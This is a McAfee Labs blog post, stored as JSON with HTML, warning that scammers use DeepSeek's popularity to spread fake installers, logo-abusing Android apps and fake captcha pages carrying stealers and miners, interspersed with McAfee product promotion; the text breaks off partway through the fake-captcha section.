{"id":209804,"date":"2025-03-17T00:00:41","date_gmt":"2025-03-17T07:00:41","guid":{"rendered":"https:\/\/www.mcafee.com\/blogs\/?p=209804"},"modified":"2025-03-17T13:57:34","modified_gmt":"2025-03-17T20:57:34","slug":"deepseek-or-deep-threat-how-hackers-are-using-ai-hype-to-deliver-malware","status":"publish","type":"post","link":"https:\/\/www.mcafee.com\/blogs\/internet-security\/deepseek-or-deep-threat-how-hackers-are-using-ai-hype-to-deliver-malware\/","title":{"rendered":"Look Before You Leap: Imposter DeepSeek Software Seek Gullible Users"},"content":{"rendered":"<p><i><span data-contrast=\"auto\">Authored by Aayush Tyagi and M, Mohanasundaram<\/span><\/i><span data-ccp-props=\"{}\">\u00a0<\/span><\/p>\n<div>\n<p><b><span data-olk-copy-source=\"MessageBody\">*Bold = Term Defined in Appendix<\/span><\/b><\/p>\n<\/div>\n<div><\/div>\n<p><span class=\"TextRun SCXW212830337 BCX0\" lang=\"EN-US\" xml:lang=\"EN-US\" data-contrast=\"auto\"><span class=\"NormalTextRun SCXW212830337 BCX0\">In this blog, we discuss how malware authors recently utilized a popular new trend to entice unsuspecting users into installing malware. This blog is meant as a reminder to stay cautious during a hype cycle<\/span><span class=\"NormalTextRun SCXW212830337 BCX0\">. <\/span><span class=\"NormalTextRun SCXW212830337 BCX0\">It<\/span><span class=\"NormalTextRun SCXW212830337 BCX0\">\u2019<\/span><span class=\"NormalTextRun SCXW212830337 BCX0\">s<\/span> <span class=\"NormalTextRun SCXW212830337 BCX0\">a common <\/span><span class=\"NormalTextRun SCXW212830337 BCX0\">trap and <\/span><span class=\"NormalTextRun SCXW212830337 BCX0\">pitfall <\/span><span class=\"NormalTextRun SCXW212830337 BCX0\">for unassuming consumers.<\/span><\/span><span class=\"EOP SCXW212830337 BCX0\" data-ccp-props=\"{&quot;335551550&quot;:6,&quot;335551620&quot;:6}\">\u00a0<\/span><\/p>\n<h2>Background<\/h2>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-210631\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-13-at-6.14.27-PM.png\" alt=\"\" width=\"1784\" height=\"528\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-13-at-6.14.27-PM.png 1784w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-13-at-6.14.27-PM-300x89.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-13-at-6.14.27-PM-1024x303.png 1024w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-13-at-6.14.27-PM-768x227.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-13-at-6.14.27-PM-1536x455.png 1536w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-13-at-6.14.27-PM-205x61.png 205w\" sizes=\"auto, (max-width: 1784px) 100vw, 1784px\" \/><\/p>\n<p style=\"text-align: center;\"><em><strong><span class=\"TextRun MacChromeBold SCXW211238534 BCX0\" lang=\"EN-US\" xml:lang=\"EN-US\" data-contrast=\"auto\"><span class=\"NormalTextRun SCXW211238534 BCX0\">Figure 1: <\/span><span class=\"NormalTextRun SCXW211238534 BCX0\">DeepSeek<\/span><span class=\"NormalTextRun SCXW211238534 BCX0\"> Google Search Trend from 1<\/span><\/span><span class=\"TextRun MacChromeBold SCXW211238534 BCX0\" lang=\"EN-US\" xml:lang=\"EN-US\" data-contrast=\"auto\"><span class=\"NormalTextRun Superscript SCXW211238534 BCX0\" data-fontsize=\"10\">st<\/span><\/span><span class=\"TextRun MacChromeBold SCXW211238534 BCX0\" lang=\"EN-US\" xml:lang=\"EN-US\" data-contrast=\"auto\"><span class=\"NormalTextRun SCXW211238534 BCX0\"> January to 7<\/span><\/span><span class=\"TextRun MacChromeBold SCXW211238534 BCX0\" lang=\"EN-US\" xml:lang=\"EN-US\" data-contrast=\"auto\"><span class=\"NormalTextRun Superscript SCXW211238534 BCX0\" data-fontsize=\"10\">th<\/span><\/span><span class=\"TextRun MacChromeBold SCXW211238534 BCX0\" lang=\"EN-US\" xml:lang=\"EN-US\" data-contrast=\"auto\"><span class=\"NormalTextRun SCXW211238534 BCX0\"> March<\/span><\/span><span class=\"EOP SCXW211238534 BCX0\" data-ccp-props=\"{&quot;335559685&quot;:1440}\">\u00a0<\/span><\/strong><\/em><\/p>\n<div class=\"flex max-w-full flex-col flex-grow\">\n<div class=\"min-h-8 text-message relative flex w-full flex-col items-end gap-2 whitespace-normal break-words text-start [.text-message+&amp;]:mt-5\" dir=\"auto\" data-message-author-role=\"assistant\" data-message-id=\"03e1d6d1-9949-4dca-882c-a29cada3a836\" data-message-model-slug=\"gpt-4o\">\n<div class=\"flex w-full flex-col gap-1 empty:hidden first:pt-[3px]\">\n<div class=\"markdown prose w-full break-words dark:prose-invert light\">\n<p data-start=\"0\" data-end=\"505\" data-is-last-node=\"\" data-is-only-node=\"\">Malware creators frequently exploit trending search terms through hashtags and SEO manipulation to boost visibility and climb search rankings. This tactic, known as SEO poisoning, helps drive traffic to malicious sites, increasing downloads or earning rewards through affiliate programs. Recently, &#8220;AI&#8221; (Artificial Intelligence) has been one of the most popular keywords leveraged in these scams. Earlier this year, &#8220;DeepSeek&#8221; also gained traction, even surpassing &#8220;Nvidia&#8221; at its peak in search interest.<\/p>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<p><span data-contrast=\"auto\">Let\u2019s look at how we got here. Artificial Intelligence (AI) tools are transforming the world at an unprecedented pace, right before our eyes. In recent years, we\u2019ve witnessed remarkable advancements in Generative AI, from the development of highly successful frontier of LLM\u2019s (Large Language Models) such as ChatGPT, Gemini, LLaMA, Grok, etc., to their applications as coding assistants (GitHub Co-pilot or Tabnine), meeting assistants, and voice cloning software among the more popular ones. <\/span><\/p>\n<p><span data-contrast=\"auto\">These tools are pervasive and easily available at your fingertips. In today\u2019s world AI isn\u2019t just a complicated term utilized by select organizations, it&#8217;s now adopted by every household in one way or another and is reshaping entire industries and economies. <\/span><span data-ccp-props=\"{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559731&quot;:720}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">With the good comes the bad, and unfortunately AI has enabled an accelerated ecosystem of scammers adopting these tools \u2013 examples are:<\/span><span data-ccp-props=\"{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559731&quot;:720}\">\u00a0<\/span><\/p>\n<ul>\n<li data-leveltext=\"\uf0b7\" data-font=\"Symbol\" data-listid=\"2\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559685&quot;:1440,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Symbol&quot;,&quot;469769242&quot;:[8226],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;\uf0b7&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" aria-setsize=\"-1\" data-aria-posinset=\"1\" data-aria-level=\"1\"><span data-contrast=\"auto\">creating <\/span><a href=\"https:\/\/www.mcafee.com\/ai\/deepfake\/\"><span data-contrast=\"none\">deepfake<\/span><\/a><span data-contrast=\"auto\"> videos for fake propaganda or fake advertising<\/span><span data-ccp-props=\"{&quot;335551550&quot;:6,&quot;335551620&quot;:6}\">\u00a0<\/span><\/li>\n<\/ul>\n<ul>\n<li data-leveltext=\"\uf0b7\" data-font=\"Symbol\" data-listid=\"2\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559685&quot;:1440,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Symbol&quot;,&quot;469769242&quot;:[8226],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;\uf0b7&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" aria-setsize=\"-1\" data-aria-posinset=\"2\" data-aria-level=\"1\"><span data-contrast=\"auto\">creating voice clones for \u201chey mum\u201d scams or <\/span><a href=\"https:\/\/www.mcafee.com\/content\/dam\/consumer\/en-us\/resources\/cybersecurity\/artificial-intelligence\/rp-beware-the-artificial-impostor-report.pdf\"><span data-contrast=\"none\">imposter<\/span><\/a><span data-contrast=\"auto\"> scam voice mails from the IRS<\/span><span data-ccp-props=\"{&quot;335551550&quot;:6,&quot;335551620&quot;:6}\">\u00a0<\/span><\/li>\n<\/ul>\n<ul>\n<li data-leveltext=\"\uf0b7\" data-font=\"Symbol\" data-listid=\"2\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559685&quot;:1440,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Symbol&quot;,&quot;469769242&quot;:[8226],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;\uf0b7&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" aria-setsize=\"-1\" data-aria-posinset=\"3\" data-aria-level=\"1\"><span data-contrast=\"auto\">generating almost perfect-sounding text and emails for socially engineered scams leading to phishing<\/span><span data-ccp-props=\"{&quot;335551550&quot;:6,&quot;335551620&quot;:6}\">\u00a0<\/span><\/li>\n<\/ul>\n<ul>\n<li data-leveltext=\"\uf0b7\" data-font=\"Symbol\" data-listid=\"2\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559685&quot;:1440,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Symbol&quot;,&quot;469769242&quot;:[8226],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;\uf0b7&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" aria-setsize=\"-1\" data-aria-posinset=\"4\" data-aria-level=\"1\"><span data-contrast=\"auto\">generation of <\/span><a href=\"https:\/\/www.mcafee.com\/blogs\/internet-security\/how-social-media-is-spreading-l-a-misinformation-like-wildfire\/\"><span data-contrast=\"none\">images<\/span><\/a><span data-contrast=\"auto\"> to evoke sentiments resulting in charity scams<\/span><span data-ccp-props=\"{&quot;335551550&quot;:6,&quot;335551620&quot;:6}\">\u00a0<\/span><\/li>\n<\/ul>\n<p><span data-contrast=\"auto\">Besides the application of AI tools that empower scammers, there is the good old use case of piggybacking on popular news trends<\/span><span data-contrast=\"auto\"><span style=\"box-sizing: border-box; margin: 0px; padding: 0px;\">, where popular search terms are used to bait gullible users (read our\u00a0<a href=\"https:\/\/www.mcafee.com\/blogs\/internet-security\/scam-alert-fake-minecraft-roblox-hacks-on-youtube-hide-malware-target-kids\/\" target=\"_blank\" rel=\"noopener\">blog<\/a>\u00a0on how game cracks are used as lures to deliver malware). One such popular news-worthy term that is being abused is\u00a0<a href=\"https:\/\/www.mcafee.com\/blogs\/privacy-identity-protection\/explaining-deepseek-the-ai-disruptor-thats-raising-red-flags-for-privacy-and-security\/\" target=\"_blank\" rel=\"noopener\"><em>DeepSeek,<\/em><\/a> which McAfee<\/span>\u00a0discussed early this year.<\/span><span data-ccp-props=\"{&quot;335551550&quot;:6,&quot;335551620&quot;:6}\">\u00a0<\/span><\/p>\n<h2 aria-level=\"2\"><span data-contrast=\"none\">Jumping on the DeepSeek-Hype Bandwagon\u00a0<\/span><span data-ccp-props=\"{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335559738&quot;:160,&quot;335559739&quot;:80}\">\u00a0<\/span><\/h2>\n<p><span data-contrast=\"auto\">The launch of the DeepSeek-R1 model (by DeepSeek, a Chinese company) generated significant buzz. The model is claimed to have been innovated so that the cost of building and using the technology is a fraction1 of the cost compared to other Generative AI models such as OpenAI&#8217;s GPT-4o or Meta&#8217;s Llama 3.1. Moreover, the R1 model was released in January<\/span><span data-contrast=\"auto\">\u00a02025 under an Open-Source license.\u00a0<\/span><span data-ccp-props=\"{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559731&quot;:720}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">Within a few days of the release of the DeepSeek-R1 model, the Deepseek AI assistant\u2014a chatbot for the R1 model\u2014was launched on the Apple App Store and later the Google Play Store. In both app stores, Deepseek\u2019s chatbot, which is an alternative to OpenAI&#8217;s ChatGPT, took the No. 1 spot and has been downloaded over 30 million times. <\/span><span data-ccp-props=\"{&quot;335551550&quot;:6,&quot;335551620&quot;:6}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">This stirred up the curiosity of many who wanted to experiment with the model. The interest spiked to a point where the DeepSeek website wasn\u2019t available at times due to the sheer volume of people trying to set up accounts or download their app. This sense of excitement, anxiety, and impatience is exactly what scammers look for in their victims. It wasn\u2019t shortly after the term went \u201cviral\u201d that scammers saw an opportunity and began cloaking malware disguised as DeepSeek. Various malware campaigns followed, which included Crypto-miners, fake installers, DeepSeek impersonator websites, and fake DeepSeek mobile apps. <\/span><span data-ccp-props=\"{&quot;335551550&quot;:6,&quot;335551620&quot;:6}\">\u00a0<\/span><\/p>\n<h2 aria-level=\"2\"><span data-contrast=\"none\">First Things First &#8211; Am I Protected?<\/span><span data-ccp-props=\"{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335559738&quot;:160,&quot;335559739&quot;:80}\">\u00a0<\/span><\/h2>\n<p>At McAfee Labs, we work hard to keep you safe, but staying informed is always a smart move. When navigating trending news stories, it\u2019s important to stay cautious and take necessary precautions. We continuously track emerging threats across multiple platforms\u2014including Windows, macOS, Android, iOS, and ChromeOS\u2014to ensure our customers remain protected. While we do our part, don\u2019t forget to do yours: enable Scam Protection, Web Protection, and Antivirus in your preferred security product.<\/p>\n<p>McAfee products offer <a href=\"https:\/\/www.mcafee.com\/en-us\/antivirus\/mcafee-total-protection.html\">advanced AI-powered protection<\/a> across all tiers\u2014Basic, Essential, Premium, Advanced, and Ultimate. Our AI-Suite includes features like AI-powered Antivirus, Text Scam Detection, Web Protection, VPN, and Identity Protection, providing comprehensive security.<\/p>\n<p>Check out <a href=\"https:\/\/www.mcafee.com\/blogs\/mcafee-news\/introducing-our-new-scam-detector\/\">McAfee Scam Detector<\/a>, which enhances our ability to combat a wide range of scams and is included in our products at no extra cost.<\/p>\n<p>For more tips on avoiding scams and staying safe online, visit the <a href=\"https:\/\/www.mcafee.com\/ai\">McAfee Smart AI Hub<\/a> at mcafee.ai. You can also explore the latest insights on the State of the Scamiverse on <a href=\"https:\/\/cts.businesswire.com\/ct\/CT?id=smartlink&amp;url=https%3A%2F%2Fwww.mcafee.com%2Fblogs%2Finternet-security%2Fstate-of-the-scamiverse&amp;esheet=54172915&amp;newsitemid=20250106974410&amp;lan=en-US&amp;anchor=McAfee%26%238217%3Bs+blog&amp;index=2&amp;md5=8eed0bd1072dfdca1807184b461aa57b\">McAfee\u2019s blog<\/a> and stay up to date on scam prevention strategies.<\/p>\n<p>Together, we can outsmart scammers and make the internet safer for everyone.<\/p>\n<p>&nbsp;<\/p>\n<h2><span class=\"TextRun SCXW252878054 BCX0\" lang=\"EN-US\" xml:lang=\"EN-US\" data-contrast=\"none\"><span class=\"NormalTextRun SCXW252878054 BCX0\" data-ccp-parastyle=\"heading 2\">DeepSeek<\/span> <span class=\"NormalTextRun SCXW252878054 BCX0\" data-ccp-parastyle=\"heading 2\">Malware Campaign<\/span><span class=\"NormalTextRun SCXW252878054 BCX0\" data-ccp-parastyle=\"heading 2\"> Example<\/span><span class=\"NormalTextRun SCXW252878054 BCX0\" data-ccp-parastyle=\"heading 2\">s<\/span><\/span><span class=\"EOP SCXW252878054 BCX0\" data-ccp-props=\"{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335559738&quot;:160,&quot;335559739&quot;:80}\">\u00a0<\/span><\/h2>\n<p><span data-contrast=\"auto\">In the rest of this article, we use simple examples to delve into more technical details for those seeking more analysis details.<\/span><span data-ccp-props=\"{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559731&quot;:720}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">McAfee Labs uncovered a variety of DeepSeek-themed malware campaigns attempting to exploit its popularity and target tech savvy users. Multiple malware families were able to distribute their latest variants under the false pretense of being DeepSeek software.\u00a0<\/span><span data-ccp-props=\"{&quot;335559731&quot;:720}\">\u00a0<\/span><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-209808\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.18.18-PM.png\" alt=\"\" width=\"1484\" height=\"776\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.18.18-PM.png 1484w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.18.18-PM-300x157.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.18.18-PM-1024x535.png 1024w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.18.18-PM-768x402.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.18.18-PM-205x107.png 205w\" sizes=\"auto, (max-width: 1484px) 100vw, 1484px\" \/><\/p>\n<p style=\"text-align: center;\"><strong><i>Figure 2: Attack Vector<\/i>\u00a0<\/strong><\/p>\n<p><span class=\"TextRun SCXW239368248 BCX0\" lang=\"EN-US\" xml:lang=\"EN-US\" data-contrast=\"auto\"><span class=\"NormalTextRun SCXW239368248 BCX0\">U<\/span><span class=\"NormalTextRun SCXW239368248 BCX0\">sers <\/span><span class=\"NormalTextRun SCXW239368248 BCX0\">encounter<\/span> <span class=\"NormalTextRun SCXW239368248 BCX0\">some <\/span><span class=\"NormalTextRun SCXW239368248 BCX0\">threats while searching for information about <\/span><span class=\"NormalTextRun SCXW239368248 BCX0\">DeepSeek<\/span><span class=\"NormalTextRun SCXW239368248 BCX0\"> AI on the internet. They <\/span><span class=\"NormalTextRun SCXW239368248 BCX0\">encounter<\/span><span class=\"NormalTextRun SCXW239368248 BCX0\">ed<\/span><span class=\"NormalTextRun SCXW239368248 BCX0\"> websites offering <\/span><span class=\"NormalTextRun SCXW239368248 BCX0\">DeepSeek<\/span><span class=\"NormalTextRun SCXW239368248 BCX0\"> installers for different platforms, such as Android, <\/span><span class=\"NormalTextRun SCXW239368248 BCX0\">Windows<\/span><span class=\"NormalTextRun SCXW239368248 BCX0\"> and Mac.<\/span> <span class=\"NormalTextRun SCXW239368248 BCX0\">McAfee Labs found <\/span><span class=\"NormalTextRun AdvancedProofingIssueV2Themed SCXW239368248 BCX0\">a<\/span><span class=\"NormalTextRun AdvancedProofingIssueV2Themed SCXW239368248 BCX0\"> number of<\/span> <span class=\"NormalTextRun SCXW239368248 BCX0\">such<\/span><span class=\"NormalTextRun SCXW239368248 BCX0\"> installers <\/span><span class=\"NormalTextRun SCXW239368248 BCX0\">were<\/span> <span class=\"NormalTextRun SpellingErrorV2Themed SCXW239368248 BCX0\">trojanized<\/span><span class=\"NormalTextRun SCXW239368248 BCX0\"> or just repackaged applications<\/span><span class=\"NormalTextRun SCXW239368248 BCX0\">. We <\/span><span class=\"NormalTextRun SCXW239368248 BCX0\">identified<\/span><span class=\"NormalTextRun SCXW239368248 BCX0\"> multiple instances of Keyloggers, <\/span><span class=\"NormalTextRun SCXW239368248 BCX0\">Crypto miners<\/span><span class=\"NormalTextRun SCXW239368248 BCX0\">, Password Stealers, and Trojan Downloaders being distributed as <\/span><span class=\"NormalTextRun SCXW239368248 BCX0\">DeepSeek<\/span><span class=\"NormalTextRun SCXW239368248 BCX0\"> installers.<\/span> <\/span><span class=\"EOP SCXW239368248 BCX0\" data-ccp-props=\"{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335551550&quot;:6,&quot;335551620&quot;:6}\">\u00a0<\/span><\/p>\n<h3><span class=\"TextRun SCXW62111079 BCX0\" lang=\"EN-US\" xml:lang=\"EN-US\" data-contrast=\"none\"><span class=\"NormalTextRun SCXW62111079 BCX0\" data-ccp-parastyle=\"heading 3\">Example <\/span><span class=\"NormalTextRun SCXW62111079 BCX0\" data-ccp-parastyle=\"heading 3\">1<\/span><span class=\"NormalTextRun SCXW62111079 BCX0\" data-ccp-parastyle=\"heading 3\">: Fake Installers<\/span> <span class=\"NormalTextRun SCXW62111079 BCX0\" data-ccp-parastyle=\"heading 3\">and Fake Android Apps<\/span><\/span><span class=\"EOP SCXW62111079 BCX0\" data-ccp-props=\"{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335559738&quot;:160,&quot;335559739&quot;:80}\">\u00a0<\/span><\/h3>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-210646\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-13-at-6.45.39-PM.png\" alt=\"\" width=\"1900\" height=\"564\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-13-at-6.45.39-PM.png 1900w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-13-at-6.45.39-PM-300x89.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-13-at-6.45.39-PM-1024x304.png 1024w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-13-at-6.45.39-PM-768x228.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-13-at-6.45.39-PM-1536x456.png 1536w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-13-at-6.45.39-PM-205x61.png 205w\" sizes=\"auto, (max-width: 1900px) 100vw, 1900px\" \/><\/p>\n<p style=\"text-align: center;\"><em><strong><span class=\"NormalTextRun SCXW35187354 BCX0\">Figure <\/span><span class=\"NormalTextRun SCXW35187354 BCX0\">3<\/span><span class=\"NormalTextRun SCXW35187354 BCX0\">: <\/span><span class=\"NormalTextRun SCXW35187354 BCX0\">DeepSeek<\/span><span class=\"NormalTextRun SCXW35187354 BCX0\"> Installers<\/span><\/strong><\/em><\/p>\n<p><span data-contrast=\"auto\">In Figure 3, we encountered fake installers, which distribute Third-Party software, such as winManager (highlighted in red) and Audacity (highlighted in blue).\u00a0<\/span><span data-ccp-props=\"{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335551550&quot;:6,&quot;335551620&quot;:6}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">In the simplest abuse of the DeepSeek name, certain affiliates were able to spike their partner downloads and get a commission based on pay-per-install partner programs. Rogue affiliates use this tactic to generate revenue through forced installations of partner programs.\u00a0<\/span><span data-ccp-props=\"{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335551550&quot;:6,&quot;335551620&quot;:6}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">Additionally similar software installers were also observed utilizing the DeepSeek Icon to appear more believable or alternatively use click ads and modify browser settings (such as modify the search engine) with the goal of generating additional ad revenue.<\/span><span data-ccp-props=\"{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335551550&quot;:6,&quot;335551620&quot;:6}\">\u00a0<\/span><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-210661\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-13-at-6.47.20-PM.png\" alt=\"\" width=\"1920\" height=\"698\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-13-at-6.47.20-PM.png 1920w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-13-at-6.47.20-PM-300x109.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-13-at-6.47.20-PM-1024x372.png 1024w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-13-at-6.47.20-PM-768x279.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-13-at-6.47.20-PM-1536x558.png 1536w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-13-at-6.47.20-PM-205x75.png 205w\" sizes=\"auto, (max-width: 1920px) 100vw, 1920px\" \/><\/p>\n<p style=\"text-align: center;\"><em><strong><span class=\"NormalTextRun SCXW89261413 BCX0\">Figure <\/span><span class=\"NormalTextRun SCXW89261413 BCX0\">4<\/span><span class=\"NormalTextRun SCXW89261413 BCX0\">: <\/span><span class=\"NormalTextRun SpellingErrorV2Themed SCXW89261413 BCX0\">winManager<\/span><span class=\"NormalTextRun SCXW89261413 BCX0\"> (left) and Audacity (right)<\/span><\/strong><\/em><\/p>\n<p><span class=\"TextRun SCXW241883293 BCX0\" lang=\"EN-US\" xml:lang=\"EN-US\" data-contrast=\"auto\"><span class=\"NormalTextRun SCXW241883293 BCX0\">The <\/span><span class=\"NormalTextRun SCXW241883293 BCX0\">Deepseek<\/span><span class=\"NormalTextRun SCXW241883293 BCX0\"> icon was also misused by multiple Android applications to deceive users into downloading unrelated apps, thereby increasing download <\/span><span class=\"NormalTextRun SCXW241883293 BCX0\">counts<\/span><span class=\"NormalTextRun SCXW241883293 BCX0\"> and generating revenue.<\/span><\/span><span class=\"EOP SCXW241883293 BCX0\" data-ccp-props=\"{&quot;134245418&quot;:true,&quot;134245529&quot;:true}\">\u00a0<\/span><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-210676\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-13-at-6.48.27-PM.png\" alt=\"\" width=\"1814\" height=\"724\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-13-at-6.48.27-PM.png 1814w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-13-at-6.48.27-PM-300x120.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-13-at-6.48.27-PM-1024x409.png 1024w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-13-at-6.48.27-PM-768x307.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-13-at-6.48.27-PM-1536x613.png 1536w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-13-at-6.48.27-PM-205x82.png 205w\" sizes=\"auto, (max-width: 1814px) 100vw, 1814px\" \/><\/p>\n<p style=\"text-align: center;\"><em><strong><span class=\"NormalTextRun SCXW47748627 BCX0\">Figure 5: Android files <\/span><span class=\"NormalTextRun SCXW47748627 BCX0\">abusing <\/span><span class=\"NormalTextRun SCXW47748627 BCX0\">DeepSeek\u2019s<\/span><span class=\"NormalTextRun SCXW47748627 BCX0\"> Logo<\/span><\/strong><\/em><\/p>\n<p>&nbsp;<\/p>\n<h3><span class=\"TextRun SCXW234920018 BCX0\" lang=\"EN-US\" xml:lang=\"EN-US\" data-contrast=\"none\"><span class=\"NormalTextRun SCXW234920018 BCX0\" data-ccp-parastyle=\"heading 3\">Example <\/span><span class=\"NormalTextRun SCXW234920018 BCX0\" data-ccp-parastyle=\"heading 3\">2<\/span><span class=\"NormalTextRun SCXW234920018 BCX0\" data-ccp-parastyle=\"heading 3\">: Fake Captcha Page<\/span><\/span><span class=\"EOP SCXW234920018 BCX0\" data-ccp-props=\"{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335559738&quot;:0,&quot;335559739&quot;:160}\">\u00a0<\/span><\/h3>\n<p><span data-contrast=\"auto\">We also encountered DeepSeek-Themed Fake-Captcha Pages. This isn\u2019t new and has been a popular technique used as recently as 6 months ago by <\/span><a href=\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/behind-the-captcha-a-clever-gateway-of-malware\/\"><span data-contrast=\"none\">LummaStealer<\/span><\/a><span data-ccp-props=\"{&quot;335559739&quot;:240}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">Fake captcha &#8211; is a fake webpage, asking users to verify that they are human, but instead, tricks the user into downloading and executing malicious software. This malware can steal login credentials, browser information etc.\u00a0<\/span><span data-ccp-props=\"{&quot;335559739&quot;:240}\">\u00a0<\/span><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-210691\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-13-at-6.50.14-PM.png\" alt=\"\" width=\"1408\" height=\"792\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-13-at-6.50.14-PM.png 1408w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-13-at-6.50.14-PM-300x169.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-13-at-6.50.14-PM-1024x576.png 1024w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-13-at-6.50.14-PM-768x432.png 